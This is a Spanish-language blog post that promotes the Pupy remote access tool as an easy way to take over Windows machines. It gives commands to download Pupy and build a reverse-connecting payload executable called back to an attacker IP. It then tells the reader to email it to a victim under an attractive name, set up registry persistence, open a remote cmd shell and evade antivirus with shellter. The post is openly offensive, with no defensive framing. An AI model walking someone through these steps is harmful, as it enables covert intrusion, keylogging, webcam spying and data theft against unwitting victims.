Pupy – Remote Administration Tool (Hackea Windows Remotamente) Muy Facil de Usar

Halas, recien salidito del horno… un nuevo programita que lo ejecutas desde Linux y tomas el control a distancia de maquinas Windows… inclusive Windows 10. Tan facil como enviar un email con un nombre atractivo, que tu victima lo ejecute y listos, ya tienes el control de su maquina.

El articulo asi como el link a la fuente original., como es logico en LEER MAS >>>

 

Pupy – Remote Administration Tool

Saludos mis queridos lectores en esta oportunidad vengo a presentar una nueva herramienta salida del horno,llamada Pupy la cual tiene como función infectar ordenadores al estilo de msfconsole pero con un estilo mas complejo, Pupy utiliza inyección dll reflexiva y no deja rastros en el disco.

Módulos implementadas:

  • migrar (Windows)
  • entre la inyección arquitectura de procesos también trabaja (x86> x64 y x64-> x86)
  • keylogger (Windows)
  • persistencia (Windows)
  • captura de pantalla (Windows)
  • instantánea cámara web (Windows)
  • ejecución de comandos
  • descargar
  • subir
  • Proxy socks5
  • reenvío de puerto local
  • shell interactiva (cmd.exe, / bin / sh, …)
  • shell python interactiva
  • exec shellcode (gracias a @ byt3bl33d3r)
Descarga:
Antes de instalar Pupy debemos instalar  el complemento rpyc para poder ejecutar el servidor de nuestro pupy y arranque correctamente, entonces pasaremos a descargarlo e instalarlo.
 
root@kali:~/rpyc-master# pip install rpyc
Como vemos ha sido instalado correctamente los repertorios correctamente, entonces lo que haremos sera descargar el pupy y luego lo extraeremos
 
root@kali:~# wget https://github.com/n1nj4sec/pupy/archive/master.zip
 
root@kali:~# unzip master.zip
luego de ello, entraremos a la carpeta y ejecutaremos el archivo : pupygen.py
 
root@kali:~/pupy-master/pupy# python pupygen.py -h
como vemos nos arroja las opciones donde podemos crear nuestro payload, hay diferentes arquitecturas para compatibilidad de los ejecutables,la opción de conexión de nuestra IP y el puerto de escucha, entonces vamos
python pupygen.py -t exe_x86 -o jaja.exe -p 443 192.168.179.129


el nombre del archivo malioso es jaja.exe ,xD no es nada complicado solo ejecutamos el tipo de arquitectura que deseamos compilar el ejecutable y nuestra ip y el puerto, luego de ello configuramos el archivo de arranque del servidor de pupy server por nano en la terminal.

nano pupy.conf 

el la primera linea añadir la IP de ustedes donde añadieron anteriormente en el payload de pupy, igualmente el mismo puerto.

como vemos ya tenemos cargando nuestro servidor para recibir las conexiones entrantes de nuestras victimas, ahora solo mandaríamos el archivo nuestra victima.

Una ves que nuestra victima ejecute el archivo, automáticamente tenemos su sesión meterpreter corriendo como vemos en la siguiente imagen.

para poder ver los comandos añaden help como en la imagen anterior.

para ver nuestros clientes que están infectados y la info de los sistemas, en mi caso como es solo un objetivo nos arroja solamente 2 de uno.

para poder ejecutar nuestra opciones de los módulos que podemos interactuar con nuestro sistema comprometido con el comando : list_modules


lo que haremos sera crear nuestro backdoor persistente y que se ejecute cada ves que se apage el equipo de la victima, utilizaremos run persistence -m registry , en la consola del meterpreter.

para ejecutar cualquier proceso debemos añadir primero run y luego el comando de ejecución como vemos en la imagen, ahora ejecutare el siguiente comando, para conectarme a la terminal de cmd de windows.

Si deseas ponerlo indetectable  el ejecutable, puedes hacerlo con shellter ya que hace la misma función de un meterpreter para pupy.

link del articulo :

http://backtrack-omar.blogspot.com/2015/10/evadiendo-av-codificando-payloads-con.html

Ante mano les deseo un saludo a todos mis fieles lectores de mi humilde blog!
Happy Hacking CyberPunks!!!

Bear
A %d blogueros les gusta esto:
Ir a la barra de herramientas